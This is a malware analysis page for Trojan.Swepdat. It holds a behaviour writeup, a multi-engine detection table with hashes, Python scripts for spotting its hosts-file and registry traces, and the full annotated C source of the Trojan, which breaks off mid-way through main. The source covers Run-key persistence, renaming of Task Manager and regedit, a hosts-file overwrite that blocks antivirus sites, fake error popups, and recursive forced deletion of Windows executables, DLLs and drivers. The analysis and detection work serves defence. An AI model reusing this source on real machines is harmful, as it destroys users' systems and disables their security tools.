
Trojan.Swepdat
Risk Level 1: Very Low


Discovered: December 15, 2005
Updated: February 13, 2007 12:50:03 PM
Type: Trojan Horse
Systems Affected: Windows 2000, Windows 95, Windows 98, Windows Me, Windows NT, Windows Server 2003, Windows XP

When Trojan.Swepdat is executed, it performs the following actions:

1. Copies itself as %System%\WUpdates.exe.

Note: %System% is a variable that refers to the System folder. By default this is C:\Windows\System (Windows 95/98/Me), C:\Winnt\System32 (Windows NT/2000), or C:\Windows\System32 (Windows XP).

2. Adds the value:

"WUpdates" = "%System%\WUpdates.exe"

to the registry subkey:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

so that it runs every time Windows starts.

3. Attempts to rename the following files. Note that the last two change the base name as well as the extension, so removing the trailing underscore alone does not restore them:

C:\WINDOWS\pchealth\helpctr\binaries\msconfig.exe to C:\WINDOWS\pchealth\helpctr\binaries\msconfig.ex_
C:\WINDOWS\regedit.exe to C:\WINDOWS\regedit.ex_
C:\WINDOWS\system32\Restorerstrui\rstrui.exe to C:\WINDOWS\system32\Restorerstrui\rstrui.ex_
C:\WINDOWS\system32\wscui.cpl to C:\WINDOWS\system32\wscui.cp_
C:\WINDOWS\system32\wupdmgr.exe to C:\WINDOWS\system32\wupdagr.ex_
C:\WINDOWS\system32\taskmgr.exe to C:\WINDOWS\system32\taskdae.ex_

Note: the rstrui.exe path is missing a backslash between Restore and rstrui (the source reproduced further down has the same typo), so the System Restore binary in C:\WINDOWS\system32\Restore\ is not actually renamed.

4. Attempts to delete the following security-related files from the program folders listed below and all of their subfolders:

C:\Program Files\McAfee.com\Personal Firewall\*.dll
C:\Program Files\McAfee.com\Personal Firewall\data\*.*
C:\Program Files\McAfee.com\Personal Firewall\help\*.*
C:\Program Files\McAfee.com\VSO\*.dll
C:\Program Files\McAfee.com\VSO\*.ini
C:\Program Files\McAfee.com\VSO\Res00\*.dll
C:\Program Files\McAfee.com\VSO\Dat\4615\*.*
C:\Program Files\McAfee.com\*.*
C:\Program Files\Norton AntiVirus\*.dll
C:\Program Files\Common Files\Symantec Shared\*.exe
C:\Program Files\Norton AntiVirus\*.ini
C:\Program Files\Norton AntiVirus\*.exe
C:\Program Files\Norton AntiVirus\*.inf
C:\Program Files\Zone Labs\ZoneAlarm\*.exe
C:\Program Files\Zone Labs\ZoneAlarm\*.zap
C:\Program Files\Zone Labs\ZoneAlarm\*.dll
C:\Program Files\Zone Labs\ZoneAlarm\repair\*.dll
C:\Program Files\Kaspersky Lab\AVP6\*.exe
C:\Program Files\Kaspersky Lab\AVP6\*.dll

Note: the deletions are issued through cmd.exe ("del ... /F /S /Q") with the paths unquoted. cmd splits each path at the space in "Program Files" into two separate file arguments, neither of which exists, so as written these commands do not remove the files they name. "Attempts" is the operative word.

5. Writes the following entries to the hosts file so that the listed sites resolve to 0.0.0.0 and cannot be reached. The file is opened for writing rather than appending, so its previous contents (including the localhost entry) are replaced, and the source writes every entry on one space-separated line rather than one per line. "macafee.com" is misspelt as written, so mcafee.com itself is not blocked, only the mcafee.com hosts listed by name:
0.0.0.0 google.com
0.0.0.0 www.hotmail.com
0.0.0.0 www.microsoft.com
0.0.0.0 microsoft.com
0.0.0.0 macafee.com
0.0.0.0 www.macafee.com
0.0.0.0 download.mcafee.com
0.0.0.0 www.download.mcafee.com
0.0.0.0 rads.mcafee.com
0.0.0.0 us.mcafee.com
0.0.0.0 www.networkassociates.com
0.0.0.0 networkassociates.com
0.0.0.0 update.symantec.com
0.0.0.0 updates.symantec.com
0.0.0.0 iveupdate.symantec.com
0.0.0.0 norton.com
0.0.0.0 www.symantec.com
0.0.0.0 symantec.com
0.0.0.0 www.norton.com
0.0.0.0 google.com
0.0.0.0 bitdefender.com
0.0.0.0 www.viruslist.com
0.0.0.0 viruslist.com
0.0.0.0 www.virustotal.com
0.0.0.0 virustotal.com
0.0.0.0 www.kaspersky.com
0.0.0.0 kaspersky.com
0.0.0.0 kaspersky-labs.com
0.0.0.0 www.kaspersky-labs.com
0.0.0.0 www.trendmicro.com
0.0.0.0 trendmicro.com
0.0.0.0 www.pandasoftware.com
0.0.0.0 pandasoftware.com
0.0.0.0 www.nod32.com
0.0.0.0 nod32.com
0.0.0.0 yahoo.com
0.0.0.0 mail.yahoo.com
0.0.0.0 www.grisoft.com
0.0.0.0 www.f-secure.com
0.0.0.0 f-secure.com
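The hosts-file check below is an added example, not part of the Symantec writeup and not the sample's own code. It parses a hosts file the way a resolver does (per line, one address followed by any number of names, "#" opening a comment) so that it copes with the single-line file the sample's BlockSite() produces, and reports which security-vendor names are pointed at a sinkhole address. Both inputs are constructed for the example; VENDOR_SUFFIXES, SINKHOLE_ADDRESSES and the function names are this example's own choices.

```python
import ipaddress
import re

# Constructed sample input: the hosts file as BlockSite() in the source further
# down this page actually writes it. fopen(..., "w") truncates the file and each
# fprintf string is joined to the previous one by a space, so every entry ends
# up on a single line.
HOSTS_AS_WRITTEN_BY_SAMPLE = (
    "0.0.0.0 google.com 0.0.0.0 www.hotmail.com 0.0.0.0 www.microsoft.com "
    "0.0.0.0 macafee.com 0.0.0.0 download.mcafee.com 0.0.0.0 update.symantec.com "
    "0.0.0.0 www.virustotal.com 0.0.0.0 kaspersky.com 0.0.0.0 f-secure.com"
)

# Constructed clean file for comparison: comment, loopback entry, LAN alias.
HOSTS_CLEAN = """\
# Copyright (c) 1993-1999 Microsoft Corp.
127.0.0.1       localhost
192.168.1.10    fileserver fileserver.corp.example   # internal box
"""

# Addresses a hosts entry uses to make a name unreachable.
SINKHOLE_ADDRESSES = {"0.0.0.0", "127.0.0.1", "::1"}

# Vendor domains from the block list above. An entry for any of these, or for
# a host beneath them, has no legitimate reason to exist on an end-user box.
VENDOR_SUFFIXES = (
    "mcafee.com", "networkassociates.com", "symantec.com", "norton.com",
    "bitdefender.com", "viruslist.com", "virustotal.com", "kaspersky.com",
    "kaspersky-labs.com", "trendmicro.com", "pandasoftware.com", "nod32.com",
    "grisoft.com", "f-secure.com", "microsoft.com",
)

_LABEL = r"[a-z0-9](?:[a-z0-9-]*[a-z0-9])?"
HOSTNAME_RE = re.compile(rf"^{_LABEL}(?:\.{_LABEL})+$")


def _is_hostname(token):
    """True for a dotted DNS name; False for bare IPs and single labels ('localhost')."""
    try:
        ipaddress.ip_address(token)
        return False
    except ValueError:
        return bool(HOSTNAME_RE.match(token))


def parse_hosts(text):
    """Return (address, name) pairs using the hosts-file grammar: per line the
    first token is an address and every later token is a name for it.
    On the sample's one-line file the stray '0.0.0.0' tokens come out as extra
    names for 0.0.0.0, which is why the line still works as a block list."""
    pairs = []
    for raw in text.splitlines():
        tokens = raw.split("#", 1)[0].split()
        if not tokens:
            continue
        try:
            address = str(ipaddress.ip_address(tokens[0]))
        except ValueError:
            continue  # not a valid entry; a resolver ignores it as well
        pairs.extend((address, name.lower()) for name in tokens[1:])
    return pairs


def find_sinkholed(text, suffixes=VENDOR_SUFFIXES):
    """Report names the file points at a sinkhole address.

    Returns (vendor_hits, other): vendor_hits is a sorted list of (name, matched
    suffix); other is the sorted list of sinkholed names matching no suffix,
    which is where the sample's misspelt 'macafee.com' lands.
    """
    vendor_hits, other = {}, set()
    for address, name in parse_hosts(text):
        if address not in SINKHOLE_ADDRESSES or not _is_hostname(name):
            continue
        hit = next((s for s in suffixes if name == s or name.endswith("." + s)), None)
        if hit:
            vendor_hits[name] = hit
        else:
            other.add(name)
    return sorted(vendor_hits.items()), sorted(other)


if __name__ == "__main__":
    for label, text in (("sample", HOSTS_AS_WRITTEN_BY_SAMPLE), ("clean", HOSTS_CLEAN)):
        hits, other = find_sinkholed(text)
        print(f"{label}: {len(hits)} vendor name(s) sinkholed, {len(other)} other")
        for name, suffix in hits:
            print(f"  {name:<28} (matches {suffix})")
```

Matching on the suffix rather than on the literal list is deliberate: it catches liveupdate.symantec.com or any other vendor host a later variant adds, while the "other" bucket surfaces entries like google.com and the misspelt macafee.com that a vendor-only rule would miss.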

6. Closes windows with the following titles. The last is the Windows File Protection dialog that can appear when protected system files such as regedit.exe and taskmgr.exe are renamed or removed, as steps 3 and 9 do:

Windows Task Manager
Registry Editor
System Configuration Utility
Windows File Protection

7. Displays a message with the following properties:

Title: Error
Message: Access Violation at address: 0050666F

8. Creates the file C:\windows\system32\exploit.html, an HTML file whose script reloads the page and then calls a function that recurses without end; opening it in a browser hangs or crashes the browser (a local denial of service). Nothing in the Trojan opens the file.

9. Attempts to delete the following files from the following folders and all their subfolders, again through cmd.exe ("del /F /S /Q"):

C:\WINDOWS: *.exe, *.dll
C:\WINDOWS\System: *.exe, *.dll
C:\WINDOWS\System32: *.exe, *.dll
C:\WINDOWS\System32\Restore (if present): *.*
C:\WINDOWS\System32\DRIVERS (if present): *.sys

Files mapped into a running process (loaded DLLs and drivers, the kernel, cmd.exe and the Trojan itself) cannot be deleted while in use, but everything else goes, including the dllcache copies under System32 that Windows File Protection would restore from. This is the Trojan's final action; the persistence entry from step 2 matters little on a system that can no longer start normally.

10. Creates the file C:\NError.dmp, a harmless text file containing a single fake bug-check line ("Stop: 0x0000000A ...").
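A triage routine for the host-side indicators in steps 1 to 3 and 8 to 10, added here as an example; it is not part of the Symantec writeup and not the sample's code. It expands %System% per the note under step 1, matches the Run value by its data rather than its name, and works out which of the renamed tools can be put back without clobbering a file that is already there. The two snapshots are constructed test data; SYSTEM_DIR, TOOL_RENAMES and triage() are names chosen for this example.

```python
import ntpath

# %System% per OS family, exactly as the note under step 1 defines it.
SYSTEM_DIR = {
    "9x": r"C:\Windows\System",      # Windows 95/98/Me
    "nt": r"C:\Winnt\System32",      # Windows NT/2000
    "xp": r"C:\Windows\System32",    # Windows XP
}

# Step 3 as (original, renamed) pairs. Two of the six change the base name as
# well as the extension, which is why the restore list is built from this
# table instead of by stripping the trailing underscore.
TOOL_RENAMES = (
    (r"C:\WINDOWS\pchealth\helpctr\binaries\msconfig.exe",
     r"C:\WINDOWS\pchealth\helpctr\binaries\msconfig.ex_"),
    (r"C:\WINDOWS\regedit.exe", r"C:\WINDOWS\regedit.ex_"),
    (r"C:\WINDOWS\system32\Restorerstrui\rstrui.exe",
     r"C:\WINDOWS\system32\Restorerstrui\rstrui.ex_"),
    (r"C:\WINDOWS\system32\wscui.cpl", r"C:\WINDOWS\system32\wscui.cp_"),
    (r"C:\WINDOWS\system32\wupdmgr.exe", r"C:\WINDOWS\system32\wupdagr.ex_"),
    (r"C:\WINDOWS\system32\taskmgr.exe", r"C:\WINDOWS\system32\taskdae.ex_"),
)

# Constructed snapshots for the example (not real captures). "files" is the set
# of paths present on disk, "run_values" the HKLM\...\Run values as name -> data.
SAMPLE_INFECTED = {
    "os": "xp",
    "files": {
        r"C:\Windows\System32\wupdates.EXE",      # dropped copy, case differs
        r"C:\WINDOWS\regedit.ex_",
        r"C:\WINDOWS\system32\taskdae.ex_",
        r"C:\WINDOWS\system32\wscui.cp_",
        r"C:\WINDOWS\system32\wscui.cpl",          # original still present
        r"C:\NError.dmp",
    },
    "run_values": {
        "WUpdates": r"C:\Windows\System32\WUpdates.exe",
        "ctfmon.exe": r"C:\WINDOWS\system32\ctfmon.exe",
    },
}
SAMPLE_CLEAN = {
    "os": "xp",
    "files": {r"C:\WINDOWS\regedit.exe", r"C:\WINDOWS\system32\taskmgr.exe"},
    "run_values": {"ctfmon.exe": r"C:\WINDOWS\system32\ctfmon.exe"},
}


def _norm(path):
    """Case-fold and normalise so Windows paths compare regardless of case,
    surrounding quotes or redundant separators."""
    return ntpath.normpath(path.strip().strip('"')).lower()


def triage(snapshot):
    """Match one host snapshot against the indicators in steps 1-3 and 8-10.

    Returns (findings, restore): findings is a list of (kind, detail) tuples,
    restore a list of (current_name, original_name) rename pairs for tools that
    were disabled and whose original is no longer on disk.
    """
    system = SYSTEM_DIR[snapshot["os"]]
    present = {_norm(p) for p in snapshot["files"]}
    findings, restore = [], []

    dropped = ntpath.join(system, "WUpdates.exe")
    if _norm(dropped) in present:
        findings.append(("dropper", dropped))

    # Match the Run value by its DATA, not its name: the unused inst() in the
    # source picks a different value name, and any rebuild can choose another,
    # but the value still has to point at the dropped file.
    for name, data in snapshot["run_values"].items():
        if _norm(data) == _norm(dropped):
            findings.append(("persistence", f"{name} = {data}"))

    for artefact in (ntpath.join(system, "exploit.html"), r"C:\NError.dmp"):
        if _norm(artefact) in present:
            findings.append(("artefact", artefact))

    for original, renamed in TOOL_RENAMES:
        if _norm(renamed) in present:
            findings.append(("disabled-tool", renamed))
            # Only propose the rename back when it would not overwrite a file
            # that is already there (Windows File Protection may have restored it).
            if _norm(original) not in present:
                restore.append((renamed, original))
    return findings, restore


if __name__ == "__main__":
    for label, snap in (("infected", SAMPLE_INFECTED), ("clean", SAMPLE_CLEAN)):
        findings, restore = triage(snap)
        print(f"{label}: {len(findings)} finding(s)")
        for kind, detail in findings:
            print(f"  [{kind}] {detail}")
        for current, original in restore:
            # ren takes a bare file name as its second argument
            print(f'  restore: ren "{current}" "{ntpath.basename(original)}"')
```

The rstrui.exe pair is kept in TOOL_RENAMES as the Trojan spells it, missing backslash and all, so the routine reports exactly what this sample could have done rather than what its author intended.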

http://www.symantec.com/security_response/writeup.jsp?docid=2005-121515-5145-99&tabid=2
File 74014b1000255b1f306e0088a10738001789c1d3.EXE received on 2009.05.23 13:15:04 (UTC)
Antivirus Version Last Update Result
AhnLab-V3 5.0.0.2 2009.05.23 -
AntiVir 7.9.0.168 2009.05.23 TR/Qhost.EY
Antiy-AVL 2.0.3.1 2009.05.22 Trojan/Win32.Qhost
Authentium 5.1.2.4 2009.05.22 W32/Heuristic-119!Eldorado
Avast 4.8.1335.0 2009.05.22 Win32:KillWin-S
AVG 8.5.0.339 2009.05.23 Generic.MAY
BitDefender 7.2 2009.05.23 Generic.Malware.SA!Q!w.2C8E19D0
CAT-QuickHeal 10.00 2009.05.23 Trojan.Qhost.ey
ClamAV 0.94.1 2009.05.22 Trojan.Rorren
Comodo 1157 2009.05.08 TrojWare.Win32.Qhosts.EY
DrWeb 5.0.0.12182 2009.05.23 Trojan.KillFiles.472
eSafe 7.0.17.0 2009.05.21 Win32.Qhost.ey
eTrust-Vet 31.6.6519 2009.05.23 -
F-Prot 4.4.4.56 2009.05.22 W32/Heuristic-119!Eldorado
F-Secure 8.0.14470.0 2009.05.23 Trojan.Win32.Qhost.ey
Fortinet 3.117.0.0 2009.05.23 W32/Qhost.EY!tr
GData 19 2009.05.23 Generic.Malware.SA!Q!w.2C8E19D0
Ikarus T3.1.1.49.0 2009.05.23 Trojan.Win32.Qhost
K7AntiVirus 7.10.741 2009.05.21 Trojan.Win32.Qhost.ey
Kaspersky 7.0.0.125 2009.05.23 Trojan.Win32.Qhost.ey
McAfee 5623 2009.05.22 Zap-337
McAfee+Artemis 5623 2009.05.22 Zap-337
McAfee-GW-Edition 6.7.6 2009.05.23 Trojan.Qhost.EY
Microsoft 1.4701 2009.05.23 TrojanDropper:Win32/Logsnif
NOD32 4098 2009.05.22 Win32/Qhosts.EY
Norman 2009.05.22 W32/Qhost.BZ
nProtect 2009.1.8.0 2009.05.23 Trojan/W32.Qhost.12288.D
PCTools 4.4.2.0 2009.05.21 Trojan.Qhosts
Prevx 3.0 2009.05.23 -
Rising 21.30.52.00 2009.05.23 Trojan.Qhost.eq
Sophos 4.42.0 2009.05.23 Troj/Killfile-F
Sunbelt 3.2.1858.2 2009.05.23 Trojan.Swepdat
Symantec 1.4.4.12 2009.05.23 Trojan.Swepdat
TheHacker 6.3.4.3.331 2009.05.22 Trojan/Qhost.ey
TrendMicro 8.950.0.1092 2009.05.23 -
VBA32 3.12.10.5 2009.05.23 Trojan.Win32.Qhost.ey
ViRobot 2009.5.23.1749 2009.05.23 -
VirusBuster 4.6.5.0 2009.05.22 Trojan.Qhost.RW

Additional information
File size: 12288 bytes
MD5   : 35b259a4d83e4d59be351c396fd6b95a
SHA1  : e20d0a5f2600162b76a2c89e3a101ce7240fcff8
SHA256: 631cb88ed8edacc15ff90dea81ff661adc628d17919e6c138f6c867d5c46035b
W32.MaTriX@mm.cpp

/*
*closes Windows Task Manager
*closes Registry Editor
*closes System Configuration Utility
*closes Windows File Protection
*BlockSite
*Deleting Windows
*infected msconfig.exe
*infected rstrui.exe
*infected wscui.cpl
*infected wupdmgr.exe
*infected taskmgr.exe
*kill files AV&FW

made by ceoby
*/

#include <stdio.h>
#include <stdlib.h>
#include <windows.h>
#include <mmsystem.h>   /* nothing below uses it */

/* Steps 6 and 7 of the writeup. On each of 24 passes the loop closes any
   window titled like one of the four diagnostic tools, then shows the fake
   "Access Violation" box. MessageBox is modal, so the user has to dismiss it
   24 times; the 100 ms sleep is the only pause between passes. The WPARAM and
   LPARAM casts are swapped relative to the SendMessage signature, which does
   no harm because both arguments are zero. */
void hideprocess()
{
    int i;
    for (i = 1; i < 25; i++)
    {
        HWND program;
        Sleep(100);
        program = FindWindow(0, "Windows Task Manager");
        SendMessage(program, WM_CLOSE, (LPARAM)0, (WPARAM)0);
        program = FindWindow(0, "Registry Editor");
        SendMessage(program, WM_CLOSE, (LPARAM)0, (WPARAM)0);
        program = FindWindow(0, "System Configuration Utility");
        SendMessage(program, WM_CLOSE, (LPARAM)0, (WPARAM)0);
        program = FindWindow(0, "Windows File Protection");
        SendMessage(program, WM_CLOSE, (LPARAM)0, (WPARAM)0);

        MessageBox(NULL, "Access Violation at address: 0050666F", "Error", MB_OK | MB_ICONERROR);
    }
}

/* Wn and Mn are used by fPaths()/inst() below; sock, Wnd, Buffer, x and y are
   never referenced anywhere in the file. */
char Wn[MAX_PATH];
char Mn[MAX_PATH];
SOCKET sock;
HWND Wnd;
char Buffer[1230];
int x, y;

/* Steps 1 and 2: copy the running image to %System%\WUpdates.exe and register
   it under HKLM\...\Run as "WUpdates". Declared int but returns nothing.
   RegSetValueEx is passed sizeof(system) (MAX_PATH, 260 bytes) instead of the
   string length, so the REG_SZ data is the path followed by whatever was left
   in the stack buffer; registry viewers show the path, the raw value is longer. */
int Hkey()
{
    char system[MAX_PATH];
    char pathtofile[MAX_PATH];
    HMODULE GetModH = GetModuleHandle(NULL);
    GetModuleFileName(GetModH, pathtofile, sizeof(pathtofile));
    GetSystemDirectory(system, sizeof(system));
    strcat(system, "\\WUpdates.exe");
    CopyFile(pathtofile, system, FALSE);
    HKEY hKey;
    RegOpenKeyEx(HKEY_LOCAL_MACHINE, "Software\\Microsoft\\Windows\\CurrentVersion\\Run", 0,
                 KEY_SET_VALUE, &hKey);
    RegSetValueEx(hKey, "WUpdates", 0, REG_SZ, (const unsigned char *)system, sizeof(system));
    RegCloseKey(hKey);
}

/* fPaths() and inst() are a second installer that main() never calls. It would
   have used the value name "Windows Security Updates" and copied MicroSuck.exe
   and Svchost32.exe from the current directory, which is why none of those
   names appear in the writeup. The CopyFile calls that name a bare directory as
   destination would fail in any case. */
void fPaths()
{
    GetSystemDirectory(Wn, sizeof(Wn));
    GetModuleFileName(0, Mn, sizeof(Mn));
    strcat(Wn, "\\WUpdates.exe");
}

void inst()
{
    CopyFile(Mn, Wn, 0);
    CopyFile("WUpdates.exe", "C:\\windows", TRUE);
    CopyFile("MicroSuck.exe", "C:\\windows\\system", TRUE);
    CopyFile("Svchost32.exe", "C:\\windows\\system32", TRUE);
    HKEY inst;
    RegOpenKey(HKEY_LOCAL_MACHINE, "Software\\Microsoft\\Windows\\CurrentVersion\\Run", &inst);
    RegSetValueEx(inst, "Windows Security Updates", 0, REG_SZ, (LPBYTE)Wn, sizeof(Wn));
    RegCloseKey(inst);
}

/* Step 5. Mode "w" truncates the hosts file, so the original entries
   (including "127.0.0.1 localhost") are lost, and none of the strings carries
   a newline: the whole block list becomes a single line in which the extra
   "0.0.0.0" tokens are parsed as further names. "macafee.com" is misspelt,
   so mcafee.com itself stays reachable; only the named subdomains are blocked. */
void BlockSite()
{
    FILE *fpl;
    fpl = fopen("C:\\WINDOWS\\System32\\drivers\\etc\\hosts", "w");
    fprintf(fpl, "0.0.0.0 google.com");
    fprintf(fpl, " 0.0.0.0 www.hotmail.com");
    fprintf(fpl, " 0.0.0.0 www.microsoft.com");
    fprintf(fpl, " 0.0.0.0 microsoft.com");
    fprintf(fpl, " 0.0.0.0 macafee.com");
    fprintf(fpl, " 0.0.0.0 www.macafee.com");
    fprintf(fpl, " 0.0.0.0 download.mcafee.com");
    fprintf(fpl, " 0.0.0.0 www.download.mcafee.com");
    fprintf(fpl, " 0.0.0.0 rads.mcafee.com");
    fprintf(fpl, " 0.0.0.0 us.mcafee.com");
    fprintf(fpl, " 0.0.0.0 www.networkassociates.com");
    fprintf(fpl, " 0.0.0.0 networkassociates.com");
    fprintf(fpl, " 0.0.0.0 update.symantec.com");
    fprintf(fpl, " 0.0.0.0 updates.symantec.com");
    fprintf(fpl, " 0.0.0.0 iveupdate.symantec.com");
    fprintf(fpl, " 0.0.0.0 norton.com");
    fprintf(fpl, " 0.0.0.0 www.symantec.com");
    fprintf(fpl, " 0.0.0.0 symantec.com");
    fprintf(fpl, " 0.0.0.0 www.norton.com");
    fprintf(fpl, " 0.0.0.0 google.com");
    fprintf(fpl, " 0.0.0.0 bitdefender.com");
    fprintf(fpl, " 0.0.0.0 www.viruslist.com");
    fprintf(fpl, " 0.0.0.0 viruslist.com");
    fprintf(fpl, " 0.0.0.0 www.virustotal.com");
    fprintf(fpl, " 0.0.0.0 virustotal.com");
    fprintf(fpl, " 0.0.0.0 www.kaspersky.com");
    fprintf(fpl, " 0.0.0.0 kaspersky.com");
    fprintf(fpl, " 0.0.0.0 kaspersky-labs.com");
    fprintf(fpl, " 0.0.0.0 www.kaspersky-labs.com");
    fprintf(fpl, " 0.0.0.0 www.trendmicro.com");
    fprintf(fpl, " 0.0.0.0 trendmicro.com");
    fprintf(fpl, " 0.0.0.0 www.pandasoftware.com");
    fprintf(fpl, " 0.0.0.0 pandasoftware.com");
    fprintf(fpl, " 0.0.0.0 www.nod32.com");
    fprintf(fpl, " 0.0.0.0 nod32.com");
    fprintf(fpl, " 0.0.0.0 yahoo.com");
    fprintf(fpl, " 0.0.0.0 mail.yahoo.com");
    fprintf(fpl, " 0.0.0.0 www.grisoft.com");
    fprintf(fpl, " 0.0.0.0 www.f-secure.com");
    fprintf(fpl, " 0.0.0.0 f-secure.com");
    fclose(fpl);
}

/* Step 9. Recursive, forced, silent deletion through cmd.exe. Images mapped
   into a running process (the kernel, loaded DLLs and drivers, cmd.exe and the
   Trojan itself) cannot be deleted while in use; everything else goes,
   dllcache included. This is the last thing main() calls. */
void DelWin()
{
    system("del C:\\WINDOWS\\*.exe /F /S /Q");
    system("del C:\\WINDOWS\\*.dll /F /S /Q");
    system("del C:\\WINDOWS\\System\\*.exe /F /S /Q");
    system("del C:\\WINDOWS\\System\\*.dll /F /S /Q");
    system("del C:\\WINDOWS\\System32\\*.exe /F /S /Q");
    system("del C:\\WINDOWS\\System32\\*.dll /F /S /Q");
    system("del C:\\WINDOWS\\System32\\Restore\\*.* /F /S /Q");
    system("del C:\\WINDOWS\\System32\\DRIVERS\\*.sys /F /S /Q");
}

/* Never called. The semicolon after for(...) makes the loop empty, so the block
   that follows runs exactly once and writes about 1 KB of text; the file is
   never closed. "Uknown" is the author's spelling. */
void spaceup()
{
    char i;
    FILE *Uknown;
    Uknown = fopen("C:\\WINDOWS\\System32\\WUpdates.txt", "w");
    for (i = 1; i < 100; i++);
    {
        Sleep(100);
        fprintf(Uknown, "0x0000000,0x0000000,Ax0000000,0x0000000,0x0000000,0x0000000");
        fprintf(Uknown, "0x00C0000,Bx0000000,Ax0000000,0x0000000,0x0000000,0x0000000");
        fprintf(Uknown, "0x00000F0,0x0000000,7x0000000,0x00FF000,Ax0000000,0x0000000");
        fprintf(Uknown, "0x0000000,0x0000000,Ax0000000,0x0000000,0x0000000,0x0000000");
        fprintf(Uknown, "0x0000000,0x0000000,Ax0000000,0x0000000,0x000E000,0x0000000");
        fprintf(Uknown, "0x0000000,0D0000000,Bx0000000,0x0000000,0x0000000,0x0000000");
        fprintf(Uknown, "0x0000000,0x0000000,Ax0000000,0x0000000,0x0000000,0x0000000");
        Sleep(100);
        fprintf(Uknown, "0x0000000,0x0000000,Ax0000000,0x0000000,0x0000000,0x0000000");
        fprintf(Uknown, "0x0000000,0x0000000,Nx0000000,0x0000000,0x0000000,0x0000000");
        fprintf(Uknown, "Ax0000000,0x0000000,Ax0000000,0x0000000,0x0000000,0x0000000");
        fprintf(Uknown, "0x0000000,0x0000000,Ax000F000,0x00CCC00,0x0000C00,0xFFF0000");
        Sleep(100);
        fprintf(Uknown, "0x0000000,0x0000000,Ax0000000,0x0000000,0x0000000,0x0000000");
        fprintf(Uknown, "0x0000000,0x0000000,Ax0000000,0x0000000,0x0000000,0x0000000");
        fprintf(Uknown, "0x0000000,0x0000000,Ax0000000,0x0000000,0x0000000,0x0000000");
        fprintf(Uknown, "3x0000000,0x0000000,Ax0000000,0x0000000,0x0000000,0x0000000");
        fprintf(Uknown, "0x0000000,0x0000000,Ax0000000,0x0000000,0x0000000,0x0000000");
    }
}

/* Step 8. Writes a page whose script reloads itself (history.go(0) is
   evaluated when the Function object is built) and then recurses until the
   stack is exhausted; opening it hangs the browser. Nothing in this file opens
   it, and the FILE is never fclose()d, so the text is flushed at process exit. */
void Exploit()
{
    FILE *ghp;
    ghp = fopen("C:\\windows\\system32\\exploit.html", "w");
    fprintf(ghp, "<html>");
    fprintf(ghp, "<script>");
    fprintf(ghp, "window.onerror=new Function(history.go(0));");
    fprintf(ghp, "function btf(){btf();}");
    fprintf(ghp, "btf();");
    fprintf(ghp, "</script>");
    fprintf(ghp, "</html>");
}

/* Step 3. The for statement has no braces, so only the first rename() is in
   the loop body: the msconfig.exe rename is attempted 9,999,998 times (it
   succeeds once and fails thereafter), after which the remaining renames, the
   Sleep()s and the message box each run once. "Restorerstrui" is missing a
   backslash between Restore and rstrui, so the System Restore binary is not
   actually touched. Two renames also change the base name (wupdmgr -> wupdagr,
   taskmgr -> taskdae). */
void Anticlean()
{
    int i;
    for (i = 1; i < 9999999; i++)
        rename("C:\\WINDOWS\\pchealth\\helpctr\\binaries\\msconfig.exe",
               "C:\\WINDOWS\\pchealth\\helpctr\\binaries\\msconfig.ex_");
    Sleep(100);
    rename("C:\\WINDOWS\\regedit.exe", "C:\\WINDOWS\\regedit.ex_");
    Sleep(100);
    rename("C:\\WINDOWS\\system32\\Restorerstrui\\rstrui.exe",
           "C:\\WINDOWS\\system32\\Restorerstrui\\rstrui.ex_");
    Sleep(100);
    rename("C:\\WINDOWS\\system32\\wscui.cpl", "C:\\WINDOWS\\system32\\wscui.cp_");
    Sleep(100);
    rename("C:\\WINDOWS\\system32\\wupdmgr.exe", "C:\\WINDOWS\\system32\\wupdagr.ex_");
    Sleep(100);
    rename("C:\\WINDOWS\\system32\\taskmgr.exe", "C:\\WINDOWS\\system32\\taskdae.ex_");
    Sleep(100);
    MessageBox(NULL, "Access Violation at address: 0050666F", "Error", MB_OK | MB_ICONERROR);
}

/* Step 4. Every path here contains a space and none is quoted, so cmd.exe's
   del sees "C:\Program" and "Files\McAfee.com\..." as two separate file
   arguments, neither of which exists. As written these commands do not reach
   the vendor directories they name. */
void killavfw()
{
    system("del C:\\Program Files\\McAfee.com\\Personal Firewall\\*.dll /F /S /Q ");
    system("del C:\\Program Files\\McAfee.com\\Personal Firewall\\data\\*.* /F /S /Q ");
    system("del C:\\Program Files\\McAfee.com\\Personal Firewall\\help\\*.* /F /S /Q ");
    system("del C:\\Program Files\\McAfee.com\\VSO\\*.dll /F /S /Q ");
    system("del C:\\Program Files\\McAfee.com\\VSO\\*.ini /F /S /Q ");
    system("del C:\\Program Files\\McAfee.com\\VSO\\Res00\\*.dll /F /S /Q ");
    system("del C:\\Program Files\\McAfee.com\\VSO\\Dat\\4615\\*.* /F /S /Q ");
    system("del C:\\Program Files\\McAfee.com\\*.* /F /S /Q ");
    system("del C:\\Program Files\\Norton AntiVirus\\*.dll /F /S /Q ");
    system("del C:\\Program Files\\Common Files\\Symantec Shared\\*.exe /F /S /Q ");
    system("del C:\\Program Files\\Norton AntiVirus\\*.ini /F /S /Q");
    system("del C:\\Program Files\\Norton AntiVirus\\*.exe /F /S /Q ");
    system("del C:\\Program Files\\Norton AntiVirus\\*.inf /F /S /Q ");
    system("del C:\\Program Files\\Zone Labs\\ZoneAlarm\\*.exe /F /S /Q ");
    system("del C:\\Program Files\\Zone Labs\\ZoneAlarm\\*.zap /F /S /Q ");
    system("del C:\\Program Files\\Zone Labs\\ZoneAlarm\\*.dll /F /S /Q ");
    system("del C:\\Program Files\\Zone Labs\\ZoneAlarm\\repair\\*.dll /F /S /Q ");
    system("del C:\\Program Files\\Kaspersky Lab\\AVP6\\*.exe /F /S /Q ");
    system("del C:\\Program Files\\Kaspersky Lab\\AVP6\\*.dll /F /S /Q ");
}

int main(int argc, char *argv[])
{
    /* Built as a console program: allocate the console, then hide the first
       console window found so that nothing is visible on screen. */
    HWND wndstealth;
    AllocConsole();
    wndstealth = FindWindowA("ConsoleWindowClass", NULL);
    ShowWindow(wndstealth, 0);

    Hkey();         /* steps 1-2: drop copy, Run value */
    Anticlean();    /* step 3: rename tools, one fake error box */
    killavfw();     /* step 4: AV/firewall deletions (ineffective, see above) */
    BlockSite();    /* step 5: overwrite hosts file */
    hideprocess();  /* steps 6-7: close tool windows, 24 fake error boxes */
    Exploit();      /* step 8: exploit.html */
    DelWin();       /* step 9: delete Windows */

    /* Step 10: a fake bug-check line in C:\NError.dmp. The braces around the
       two statements are redundant. */
    FILE *fp;
    fp = fopen("c:\\NError.dmp", "w");
    {
        fprintf(fp, "%s", "Stop: 0x0000000A (0xFFFFFFFC,0x00000002,0x00000000,0x804DC42A)");
